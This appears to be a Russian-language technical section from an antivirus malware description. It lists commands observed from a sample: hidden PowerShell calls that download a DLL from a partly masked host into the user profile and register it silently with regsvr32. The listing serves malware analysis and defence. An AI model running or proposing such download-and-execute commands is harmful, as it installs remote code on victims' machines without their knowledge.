Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Invoke-WebRequest http://z9##gft.com/f64b/oddg.php?l=########## -OutFile $ENV:UserProfile\keys.dll"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Sleep -s 50 ; regsvr32 /s $env:Userprofile\keys.dll"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Invoke-WebRequest http://z9##gft.com/f64b/oddg.php?l=########## -OutFile $ENV:UserProfile\keys.dll"' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Sleep -s 50 ; regsvr32 /s $env:Userprofile\keys.dll"' (со скрытым окном)
- '<SYSTEM32>\regsvr32.exe' /s %HOMEPATH%\keys.dll